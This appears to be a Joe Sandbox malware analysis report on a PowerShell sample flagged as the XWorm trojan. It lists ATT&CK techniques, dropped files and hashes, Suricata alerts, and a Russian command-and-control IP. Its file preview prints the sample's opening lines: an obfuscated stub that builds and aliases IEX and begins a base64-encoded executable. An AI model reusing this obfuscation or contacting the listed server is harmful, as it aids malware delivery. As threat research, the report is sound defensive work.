            Process Injection            		Security Account Manager131
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive1
            Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Deobfuscate/Decode Files or Information            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Obfuscated Files or Information            		LSA Secrets1
            System Network Configuration Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
            Software Packing            		Cached Domain Credentials2
            File and Directory Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading            		DCSync13
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            176.113.115_1.170.ps118%VirustotalBrowse
            176.113.115_1.170.ps113%ReversingLabsWin32.Trojan.Generic

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            176.113.115.1700%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            No contacted domains info

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            176.113.115.170true
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1361364825.0000024AA0D94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1341599146.0000024A91DF8000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1341599146.0000024A90D37000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1341599146.0000024A90D37000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://go.micropowershell.exe, 00000000.00000002.1341599146.0000024A90F6F000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://contoso.com/powershell.exe, 00000000.00000002.1341599146.0000024A91DF8000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1361364825.0000024AA0D94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1341599146.0000024A91DF8000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://contoso.com/Licensepowershell.exe, 00000000.00000002.1341599146.0000024A91DF8000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://contoso.com/Iconpowershell.exe, 00000000.00000002.1341599146.0000024A91DF8000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://upx.sf.netAmcache.hve.18.drfalse
                              		high
                              https://aka.ms/pscore68powershell.exe, 00000000.00000002.1341599146.0000024A90B11000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1341599146.0000024A90B11000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.3662994755.00000000031F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1341599146.0000024A90D37000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    176.113.115.170
                                    		unknownRussian Federation
                                    		49505SELECTELRUtrue

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1583224
                                    Start date and time:2025-01-02 08:59:09 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 7m 21s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:20
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:176.113.115_1.170.ps1
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winPS1@7/10@0/1
                                    EGA Information:Failed
                                    HCA Information:
                                    • Successful, ratio: 94%
                                    • Number of executed functions: 12
                                    • Number of non-executed functions: 5
                                    Cookbook Comments:
                                    • Found application associated with file extension: .ps1
                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                    Warnings

                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 20.189.173.20, 13.107.246.45, 20.109.210.53, 40.126.31.71
                                    • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target RegSvcs.exe, PID 7336 because it is empty
                                    • Execution Graph export aborted for target powershell.exe, PID 2144 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtSetInformationFile calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    03:00:10API Interceptor33x Sleep call for process: powershell.exe modified
                                    03:00:16API Interceptor6105546x Sleep call for process: RegSvcs.exe modified
                                    04:28:44API Interceptor1x Sleep call for process: WerFault.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    No context

                                    Domains

                                    No context

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    SELECTELRUbotx.sh4.elfGet hashmaliciousMiraiBrowse
                                    • 178.132.202.249
                                    TUp6f2knn2.exeGet hashmaliciousLummaCBrowse
                                    • 176.113.115.19
                                    sqJIHyPqhr.exeGet hashmaliciousLummaCBrowse
                                    • 176.113.115.19
                                    https://img10.reactor.cc/pics/post/full/Sakimichan-artist-Iono-(Pokemon)-Pok%c3%a9mon-7823638.jpegGet hashmaliciousHTMLPhisherBrowse
                                    • 82.202.242.100
                                    2.png.ps1Get hashmaliciousUnknownBrowse
                                    • 176.113.115.178
                                    1.png.ps1Get hashmaliciousUnknownBrowse
                                    • 176.113.115.178
                                    GO.png.ps1Get hashmaliciousUnknownBrowse
                                    • 176.113.115.178
                                    file.exeGet hashmaliciousUnknownBrowse
                                    • 176.113.115.178
                                    InstallSetup.exeGet hashmaliciousLummaCBrowse
                                    • 176.113.115.19
                                    hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                    • 176.113.115.19

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegSvcs.exe_d32518f55e75b559b65181531865f79ae4107583_f47a20a6_def73a5a-5473-4c9c-a804-c8b13db7511b\Report.wer

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):1.1757694816327586
                                    Encrypted:false
                                    SSDEEP:192:JF2Zk8QWq/0BU/SaiTHy88LkmzuiFCZ24IO8aK:L2LQWxBU/SauSL9zuiFCY4IO8a
                                    MD5:4945DDCD8D5E7AA100E27EC764EEB4C6
                                    SHA1:8F05891E1B2EC57AF82D7FEADBCE892B754DD3A8
                                    SHA-256:E0714FC7548D23C931D4C51A372E82F29D8E309FEA8BE326E8DCFC2312FB9986
                                    SHA-512:ECA978E99A89E600F2118913A0FF9A0B04222C9A2C502B27E69EA86CA83AE5290028AA4D95E49DC7A142BD5ECEF6801595B02ADAF048D771C65DD9907462CB3E
                                    Malicious:false
                                    Reputation:low
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.2.8.3.6.9.9.1.0.7.5.2.7.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.2.8.3.6.9.9.6.5.4.3.9.9.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.e.f.7.3.a.5.a.-.5.4.7.3.-.4.c.9.c.-.a.8.0.4.-.c.8.b.1.3.d.b.7.5.1.1.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.8.6.f.c.0.f.d.-.f.4.e.a.-.4.2.8.b.-.8.d.9.f.-.c.4.5.6.3.f.8.6.d.3.6.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.S.v.c.s...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.S.v.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.a.8.-.0.0.0.1.-.0.0.1.4.-.d.6.c.f.-.3.4.5.a.e.c.5.c.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.1.9.6.9.7.7.1.b.2.f.0.2.2.f.9.a.8.6.d.7.7.a.c.4.d.4.d.2.3.9.b.e.c.d.f.0.8.d.0.7.

                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERACBB.tmp.dmp

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 15 streams, Thu Jan 2 09:28:19 2025, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):337955
                                    Entropy (8bit):3.477960436201121
                                    Encrypted:false
                                    SSDEEP:3072:xv8ABPaYm8ilJt7tXpc4uEquyFR3LTgcaG:xv8AhDm/lf7hpc4jyFNTgc
                                    MD5:DD27C9C1AE42D1B3394B5B08C6E53BE6
                                    SHA1:361A3A503C9374D5BA496A88FE8612F856E64838
                                    SHA-256:862D154D91B84BE3F8F5070BF82F1A3BCA9303604352AD40159D110F1668DB76
                                    SHA-512:CB12313FB3EF5471F048291F655F26CCB557959379E22214380CC1F47FD3FD708C9F40918A6E6ED819623797854028B09C3CCC4FF4C27F61E8EF21A2E062D67D
                                    Malicious:false
                                    Reputation:low
                                    Preview:MDMP..a..... .......3\vg............4........... ...H.......$...h'.......'..$e..........`.......8...........T............@..;............'..........x)..............................................................................eJ.......*......GenuineIntel............T............Gvg....d........................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERADF5.tmp.WERInternalMetadata.xml

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8360
                                    Entropy (8bit):3.6926303601998285
                                    Encrypted:false
                                    SSDEEP:192:R6l7wVeJFf6/66Yxe9SjjgmfZg8prYx89b37sf6sdm:R6lXJN6C6YSSHgmf6C3Af6r
                                    MD5:D9FBBD20A08E8911F5A3267D0BCDE846
                                    SHA1:7AFBE052C02F14AC125F8DA5C57186A07F4779C8
                                    SHA-256:A828DE45747D8735F0D18B980675041795732B94947975F4E02A410E07E9B352
                                    SHA-512:46AA7F4AD7836B88DDBA983845C86F42A378D37D7D2B7F02413A19AD03696267D15EDC1D49C13A82449D30870E5BF55706E3E74EA4EF26E1360F0BF5D65545AA
                                    Malicious:false
                                    Reputation:low
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.3.6.<./.P.i.

                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERAE25.tmp.xml

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4726
                                    Entropy (8bit):4.446724964072215
                                    Encrypted:false
                                    SSDEEP:48:cvIwWl8zsOJg77aI9gOyWpW8VYsgYm8M4JYE+ZFk8++q8vBE+ewmDI6d:uIjfEI7Wq7VztJE+KUwmDI6d
                                    MD5:4BC366F612DFDD1543F8A313DA2AAFC9
                                    SHA1:CEF05C73610906BEC5666BE9532F1856097C7315
                                    SHA-256:C88E5042EC9C1D7D797140C1330DA6DC8C477BA301D93EDD03BF9973F8BD60E9
                                    SHA-512:048081D94A35B6D223BEA032C3A95A5CF4B86705A771FCCE0F7223DCEF3CCDB04D2DDAFC860F5F12794990011800AEE4F43BCC46DDC677DE172F83B681CB73E1
                                    Malicious:false
                                    Reputation:low
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="658111" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):64
                                    Entropy (8bit):1.1940658735648508
                                    Encrypted:false
                                    SSDEEP:3:Nlllul/suL:NllUku
                                    MD5:9092B0E83B8E62D6731409BD3B39C415
                                    SHA1:B602A92B2E62830E8B5183386F5C84D143DB72F9
                                    SHA-256:E531241B6310C4D003F9E6C6A25F9D0DC644D887C81B227C7B96CA29EC8F7416
                                    SHA-512:670AEFD1CEC191266C76AF22488D9F87556C8031CDA919A25843648DC5CD5D836551D4CC7556C7FAAF8FD6D423F88E998DBD87206AFA7342B3E839ACDD50EE92
                                    Malicious:false
                                    Reputation:low
                                    Preview:@...e.................................../............@..........

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c2gqr4wb.w0o.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tanhfh4q.da5.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):6225
                                    Entropy (8bit):3.7355660839415137
                                    Encrypted:false
                                    SSDEEP:48:yxL/2yMDOCJU20A3ukvhkvklCywwTCLEcl6jSogZo5JvJazCLEclujSogZo5JvJA:yxSykOC2rBkvhkvCCtm2Ec7HZ2EczHj
                                    MD5:4BB942C0A9079278D6EF8275162FBF93
                                    SHA1:5541691FC63AEE47755704BF7157E6748D071CFA
                                    SHA-256:B01115D50FD26643AB654CB61678A093488D07A23627C7D599D709B2F7E6C304
                                    SHA-512:A1533C6A9CD504A32F9AF8146E0D98C9A118C4ABD4EBA3427E36483B25B6CD29A0F02E9D213F6A4A1331C751CF775C95EBBF6B87AE56D4FAE151083FEEA5BC27
                                    Malicious:false
                                    Preview:...................................FL..................F.".. .....*_....r.V.\..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_....?.R.\.....V.\......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.="Z.@..........................3*N.A.p.p.D.a.t.a...B.V.1....."Z.@..Roaming.@......EW.="Z.@..........................2...R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.="Z}?..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.="Z}?.............................W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.="Z}?....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.="Z}?....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.="Z.@....9...........

                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\F2YCFIT5SYACZOPKVZG9.temp

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):6225
                                    Entropy (8bit):3.7355660839415137
                                    Encrypted:false
                                    SSDEEP:48:yxL/2yMDOCJU20A3ukvhkvklCywwTCLEcl6jSogZo5JvJazCLEclujSogZo5JvJA:yxSykOC2rBkvhkvCCtm2Ec7HZ2EczHj
                                    MD5:4BB942C0A9079278D6EF8275162FBF93
                                    SHA1:5541691FC63AEE47755704BF7157E6748D071CFA
                                    SHA-256:B01115D50FD26643AB654CB61678A093488D07A23627C7D599D709B2F7E6C304
                                    SHA-512:A1533C6A9CD504A32F9AF8146E0D98C9A118C4ABD4EBA3427E36483B25B6CD29A0F02E9D213F6A4A1331C751CF775C95EBBF6B87AE56D4FAE151083FEEA5BC27
                                    Malicious:false
                                    Preview:...................................FL..................F.".. .....*_....r.V.\..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_....?.R.\.....V.\......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.="Z.@..........................3*N.A.p.p.D.a.t.a...B.V.1....."Z.@..Roaming.@......EW.="Z.@..........................2...R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.="Z}?..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.="Z}?.............................W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.="Z}?....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.="Z}?....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.="Z.@....9...........

                                    C:\Windows\appcompat\Programs\Amcache.hve

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:MS Windows registry file, NT/2000 or above
                                    Category:dropped
                                    Size (bytes):1835008
                                    Entropy (8bit):4.417549907315027
                                    Encrypted:false
                                    SSDEEP:6144:Acifpi6ceLPL9skLmb0mWSWSPtaJG8nAgex285i2MMhA20X4WABlGuNa5+:li58WSWIZBk2MM6AFBco
                                    MD5:1F4A4FBDC54059C5E935B2AED9B87A07
                                    SHA1:2401B2552792D43E7B62176410217B58B7889EFE
                                    SHA-256:11E76B588B18CAA34E0CF07ABB7516D6BBD8715C08219D29E6E25BD18F22BA67
                                    SHA-512:91A657711433DE5F48A4B9D1DA0E4F423B647DB9F0CD565C72E2E52EB5B77350378A76A54004739C7F4C14A3D61CDBD60846A03D615163BBA5F40E4DD26DD7E9
                                    Malicious:false
                                    Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.v...\.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    Static File Info

                                    General

                                    File type:ASCII text, with very long lines (65463), with CRLF line terminators
                                    Entropy (8bit):5.096321012386071
                                    TrID:
                                      File name:176.113.115_1.170.ps1
                                      File size:180'108 bytes
                                      MD5:f344736e53d49acd78e0f3581a3a213c
                                      SHA1:b11cb5e95986ff251bede9754b78180b4a975ec7
                                      SHA256:3688c90e2c14026dc323b4ae1b79d4c1aead3834d883d5bcd6815971e762b88b
                                      SHA512:bf714346fb57a23f4f7006a6b3511cc55c9a74d9db3a0927d8daa6f0ffb3ad08b3bb8f82d069f0e3bdfcb58b52e03a0bb5dc52cba89e6fb61e97f1fab18ba95a
                                      SSDEEP:3072:sXkYzSm2MYra1Qdgzkqs5u0uXrRMnfB3sBVy8ZK5HKceYWQLJgvF/9EoQ6GsbwMJ:0kYzSm2MYa1Qdgzkqs5u0uXrRMnfB3sF
                                      TLSH:74045B720207BCCA97BF2F49A8403AA10C5C647B9B659168FEC905BE61BB510DF7CDB4
                                      File Content Preview:ipconfig /flushdns.... $t0='IQIQQIEX'.replace('IQIQQ','');sal GG $t0;....$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAE

                                      File Icon

                                      Icon Hash:3270d6baae77db44

                                      Network Behavior

                                      Suricata IDS Alerts

                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2025-01-02T09:00:31.572326+01002858800ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.749714176.113.115.1704412TCP
                                      2025-01-02T09:00:32.009335+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704412192.168.2.749714TCP
                                      2025-01-02T09:00:32.629988+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749714176.113.115.1704412TCP
                                      2025-01-02T09:00:45.033565+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704412192.168.2.749714TCP
                                      2025-01-02T09:00:45.035633+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749714176.113.115.1704412TCP
                                      2025-01-02T09:00:45.212244+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704412192.168.2.749714TCP
                                      2025-01-02T09:00:45.212244+01002858801ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound1176.113.115.1704412192.168.2.749714TCP
                                      2025-01-02T09:00:58.346915+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704412192.168.2.749714TCP
                                      2025-01-02T09:00:58.421438+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749714176.113.115.1704412TCP
                                      2025-01-02T09:01:12.144899+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704412192.168.2.749714TCP
                                      2025-01-02T09:01:12.146485+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749714176.113.115.1704412TCP
                                      2025-01-02T09:01:16.458355+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704412192.168.2.749714TCP
                                      2025-01-02T09:01:25.423889+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704412192.168.2.749714TCP
                                      2025-01-02T09:01:25.426143+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749714176.113.115.1704412TCP
                                      2025-01-02T09:01:38.720601+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.1704412192.168.2.749714TCP
                                      2025-01-02T09:01:38.723135+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749714176.113.115.1704412TCP
